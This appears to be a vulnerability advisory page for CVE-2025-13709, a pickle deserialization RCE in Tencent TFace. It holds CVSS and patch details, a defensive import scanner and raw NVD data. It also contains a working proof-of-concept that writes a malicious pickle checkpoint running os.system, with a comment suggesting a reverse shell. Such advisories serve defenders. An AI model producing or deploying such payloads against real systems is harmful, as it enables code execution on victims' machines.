Security Vulnerability Report
CVE-2025-13709 CVSS 7.8 HIGH

Published: 2025-12-23 22:15:46
Last Modified: 2026-01-12 17:37:20

Description

Tencent TFace restore_checkpoint Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent TFace. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the restore_checkpoint function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27185.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:tencent:tface:*:*:*:*:*:*:*:* - VULNERABLE
Tencent TFace < commit 7b2eed297d43dcdd1e3d45bfdfc950478e3af5d9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13709 PoC - Tencent TFace restore_checkpoint Deserialization RCE
# This PoC demonstrates the deserialization vulnerability in TFace's restore_checkpoint function
import pickle
import os


class Exploit:
    def __reduce__(self):
        # Execute arbitrary command - reverse shell or whoami for verification
        cmd = "whoami"
        return (os.system, (cmd,))


def generate_malicious_checkpoint():
    """
    Generate a malicious checkpoint file that exploits the deserialization vulnerability
    """
    # Create malicious payload
    exploit = Exploit()
    malicious_data = pickle.dumps(exploit)

    # Save as checkpoint file
    with open('malicious_checkpoint.pkl', 'wb') as f:
        f.write(malicious_data)

    print("[+] Malicious checkpoint file created: malicious_checkpoint.pkl")
    print("[+] Payload: os.system('whoami')")
    return malicious_data


def simulate_vulnerable_code(serialized_data):
    """
    Simulate the vulnerable restore_checkpoint function behavior
    """
    print("[*] Simulating restore_checkpoint with untrusted data...")
    try:
        # VULNERABLE: No input validation before deserialization
        data = pickle.loads(serialized_data)
        print("[+] Data deserialized successfully (VULNERABLE!)")
        return data
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-13709 PoC - TFace Deserialization RCE")
    print("=" * 60)

    # Generate malicious checkpoint
    malicious_data = generate_malicious_checkpoint()

    # Demonstrate exploitation
    print("\n[*] Triggering vulnerability...")
    simulate_vulnerable_code(malicious_data)
```
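A defensive counterpart to the flaw described above, as an added example that is not code from this page or from TFace: it statically lists the imports a pickle-based checkpoint requests, without deserializing it, and reports anything outside an allowlist. The allowlist, the function names and both sample streams are assumptions constructed for illustration; imports that cannot be resolved statically are treated as disallowed.

```python
import os
import pickle
import pickletools
from collections import OrderedDict

# Assumption: hypothetical allowlist for a checkpoint made of plain containers only.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}
STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}
MEMO_WRITES = {"MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"}
UNRESOLVED = ("<unresolved>", "<unresolved>")


def referenced_globals(data: bytes):
    """List the (module, name) imports a pickle stream requests, without loading it."""
    found, recent = [], []  # recent: the last two pushed values (str, or None if not a string)
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):   # older protocols: arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif opcode.name == "STACK_GLOBAL":     # protocol 4+: module and name come from the stack
            ok = len(recent) == 2 and all(isinstance(s, str) for s in recent)
            found.append(tuple(recent) if ok else UNRESOLVED)  # fail closed if unclear
        elif opcode.name in MEMO_WRITES:
            continue                            # memo writes leave the stack unchanged
        recent = (recent + [arg if opcode.name in STRING_OPS else None])[-2:]
    return found


def disallowed_globals(data: bytes):
    """Return imports outside the allowlist; an empty list means none were found."""
    try:
        refs = referenced_globals(data)
    except Exception:                           # truncated or malformed stream
        return [UNRESOLVED]
    return [g for g in refs if g not in ALLOWED_GLOBALS]


class _Constructed:                             # constructed sample, same shape as the PoC above
    def __reduce__(self):
        return (os.system, ("whoami",))


BENIGN = pickle.dumps(OrderedDict(step=10, lr=0.1))  # constructed sample
HOSTILE = pickle.dumps(_Constructed())               # serialized only, never loaded

if __name__ == "__main__":
    print("benign :", disallowed_globals(BENIGN))
    print("hostile:", disallowed_globals(HOSTILE))
```

A scan like this is a pre-load gate and a triage aid; an empty result says only that no import outside the allowlist was found in the opcode stream.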

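References

https://github.com/Tencent/TFace/commit/7b2eed297d43dcdd1e3d45bfdfc950478e3af5d9 (Patch)
https://www.zerodayinitiative.com/advisories/ZDI-25-1036/ (Third Party Advisory)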

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13709", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:45.577", "lastModified": "2026-01-12T17:37:20.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tencent TFace restore_checkpoint Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent TFace. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the restore_checkpoint function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27185."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tencent:tface:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-09-29", "matchCriteriaId": "469A2034-B51B-4F89-84CF-2E41DC663D76"}]}]}], "references": [{"url": "https://github.com/Tencent/TFace/commit/7b2eed297d43dcdd1e3d45bfdfc950478e3af5d9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1036/", 
"source": "[email protected]", "tags": ["Third Party Advisory"]}]}}